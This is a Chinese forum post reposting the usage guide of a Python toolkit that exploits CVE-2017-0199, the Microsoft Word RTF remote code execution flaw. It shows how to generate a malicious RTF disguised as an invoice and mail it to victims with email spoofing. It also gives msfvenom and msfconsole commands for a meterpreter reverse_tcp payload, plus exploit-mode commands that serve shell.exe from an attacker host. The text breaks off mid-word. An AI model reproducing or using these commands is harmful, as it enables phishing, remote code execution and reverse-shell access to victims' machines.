|
项目地址
https://github.com/bhdresh/CVE-2017-0199
CVE-2017-0199 – v2.0
CVE-2017-0199 – v2.0是一个比较方便测试CVE-2017-0199的python脚本,它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件,并将metasploit/meterpreter有效载荷发送给受害者,而不需要任何复杂的配置。
版本:Python版本2.7.13 - Generate Malicious RTF file using toolkit- Run toolkit in an exploitation mode as tiny HTA + Web server视频教程
https://youtu.be/42LjG7bAvpg
用法
工具包含以下功能 - Automatically send generated malicious RTF to victim using email spoofing例:
Syntax: # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta> Example: # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc Example: Generate Payload: # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe Start Handler: # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1 Syntax: # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe> Example: # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe命令行参数 # python cve-2017-0199_toolkit.py -hThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)Modes:-M gen Generate Malicious RTF file only Generate malicious RTF file: -w <Filename.rtf> Name of malicious RTF file (Share this file with victim). -u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.-M exp Start exploitation mode Exploitation: -p <TCP port:Default 80> Local port number. -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target. -l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If pay免责声明
| 
发表于 2018-1-22 21:04:39
